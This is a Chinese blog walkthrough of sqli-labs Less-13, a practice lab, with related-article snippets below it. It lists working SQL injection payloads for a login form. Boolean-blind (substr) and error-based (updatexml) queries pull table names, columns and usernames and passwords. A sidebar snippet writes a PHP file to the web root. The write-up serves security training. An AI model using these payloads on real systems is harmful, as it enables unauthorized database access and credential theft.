sqli-labs (less-13)

最新推荐文章于 2024-02-24 20:58:57 发布
最新推荐文章于 2024-02-24 20:58:57 发布
阅读量978 收藏 2
点赞数 1
分类专栏: sqli-labs 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/114599663
版权

sqli-labs (less-13)

进入13,输入用户名和密码登入,利用hackbar抓取POST请求,但是这里我们发现屏幕上这次没有数据回显了,这也说明我们这里不能再使用union注入了

输入

uname=admin'&passwd=admin&submit=Submit #页面回显错误信息


通过报错信息我们知道闭合方式为’),并且为字符型注入
因为这里没有数据回显,但是我们观察到有完整的错误信息,所以这里可以使用Boolean盲注报错注入攻击

Boolean盲注

查看当前数据库长度

uname=a') or length(database())=8#&passwd=admin&submit=Submit


判断当前数据库的第一个字母

uname=a') or substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e'#&passwd=admin&submit=Submit


判断users表下的第一个字段的第一个字母

uname=a') or substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='a'#&passwd=admin&submit=Submit


判断username字段的第一个值的第一个字母

uname=a') or substr((select username from security.users limit 0,1),1,1)='d'#&passwd=admin&submit=Submit


依次类推,猜解出数据库中的所有数据

报错注入攻击

查看当前数据库

uname=a') or updatexml(1,concat(0x7e,(database()),0x7e),1)#&passwd=admin&submit=Submit


查看security库下的第一张表

uname=a') or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)#&passwd=admin&submit=Submit


查看users表下的第一个字段

uname=a') or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),1)#&passwd=admin&submit=Submit


查看username和password字段的第一个值

uname=a') or updatexml(1,concat(0x7e,(select concat(username,password) from security.users  limit 0,1),0x7e),1)#&passwd=admin&submit=Submit


依次类推,猜解出数据库中的所有数据

super 硕
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs Less-13
qq_42630215的博客
03-27 150
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1') LIMIT 0,1' at line 1 uname= ') union select count(*),c...
sqli labs less 13
Xiaoxiaoqiang_的博客
03-02 131
小学生
sqli-labs/Less-13
m0_71299382的博客
11-18 288
sqli-labs第十三关
Sqlilabs Less-13
Light_inthe_eyes的博客
03-04 284
判断是单引号单括号字符型注入,并且成功注入时无回显,所以用报错注入: uname=admin')&passwd=&submit=Submit uname=admin')#&passwd=&submit=Submit 判断列数: uname=admin')+order+by+2#&passwd=&submit=Submit 爆库: uname=admin')+and+extractvalue(1,concat(0x7e,(select+database()
sqli-labs less13
qq_45106794的博客
10-18 364
#sqli-labs less13 由于less12 和less 11 差不多,只是单引号变成 ") 所以我们直接来解决less 13 对待less13 我们按老规矩判断其是数值型还是字符型 。。。。。。 然后我们发现他是’) 所以我们继续往下走 admin ’ order by n # 发现n=1 n=2 虽然没有想象中的回显,但是当n=3时,可以发现 所以可以判断字段数为2 接下来试试adm...
sqli-labs靶场Less-13
songling515010475的专栏
08-25 145
1、访问首页,/Less-13/index.php,这里的传参点是表单中的uname、passwd 探测六步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注 分析:这里是单引号+括号闭合,但这里正确时并没有显示点,但在探测过程中会报SQL语名错误的内容,所以这里判断可以用报错注入。 2、尝试使用报错注入 admin') and updatexml(1,concat(0x7e,(select .
sqli-labs(less-11)
m0_59092234的博客
07-31 135
先自我介绍一下,小编13年上师交大毕业,曾经在小公司待过,去过华为OPPO等大厂,18年进入阿里,直到现在。深知大多数初中级java工程师,想要升技能,往往是需要自己摸索成长或是报班学习,但对于培训机构动则近万元的学费,着实压力不小。自己不成体系的自学效率很低又漫长,而且容易碰到天花板技术停止不前。因此我收集了一份《java开发全套学习资料》送给大家,初衷也很简单,就是希望帮助到想自学又不知道该从何学起的朋友,同时减轻大家的负担。添加下方名片,即可获取全套学习资料哦。...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1350
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1765
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqli-labs:less-13
羽的博客
07-24 192
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; cha...
Sqli-labs之Less-13和Less-14
→_→
04-05 1158
Less-13 POST单引号变形双注入 由题意可知,有单引号闭合的问题,所以在输入框中分别输入 1' 和 1,看返回结果: 报错,从信息中得知还有一个小括号,测试 1') or 1=1 -- # 登录成功发现不在返回用户名和密码信息。 从以上的信息中...
sqlilabs less13~14
TA不懒,但还没有添加简介
07-01 345
sqlilabs less13
sqli-labs-less-13、14、15、16
giun的博客
02-10 991
Less-13 输入username:admin’,密码随意 故 我们输入username:admin’)#,密码随意 只返回登录状态没有登录信息 所有我们可以使用盲注,这边使用布尔类型的盲注 猜数据库第一位 输入username:admin') and left (database(),1)&amp;gt;'a'# 密码随意 然后 用二分法一个个进行尝试就可以猜出数据库了,其他过程查看less-...
SQLi LABS Less-13 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十三关,SQLi-LABS Less-13SQLi-LABS Less 13SQLiLABS Less13SQLi Less 13
SQLi-LABS Less-13&&Less-14
m0_64898960的博客
04-21 262
Less-13题目 通过bp抓包修改进行测试,得知这次需要使用 ') 来闭合 尝试获取显示位失败 尝试报错注入,成功回显 查表 查列 查列里面的内容 Less-14题目 Less-14和Less-13一样,只不过还是在闭合的地方弄了点小手脚而已 所以这里新用一个姿势来进行注入 查表 查列 查列里面的内容 总结 floor报错注入套路 1" union select count(*),concat(database(),floor(rand(0)*2))x from informat
SQLI-LABS Less-13 到 Less-14
Web学习之路
03-24 126
联合注入
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码字段。攻击者可以通过在输入框中输入特定的字符串来尝试绕过认证。 如果您想深入学习SQL注入攻击技术,sqli-labs-less1可能是一个很好的练习平台。但请注意,这个平台是为了学术目的而设计的,不要在未授权的情况下尝试对任何真实的系统进行SQL注入攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值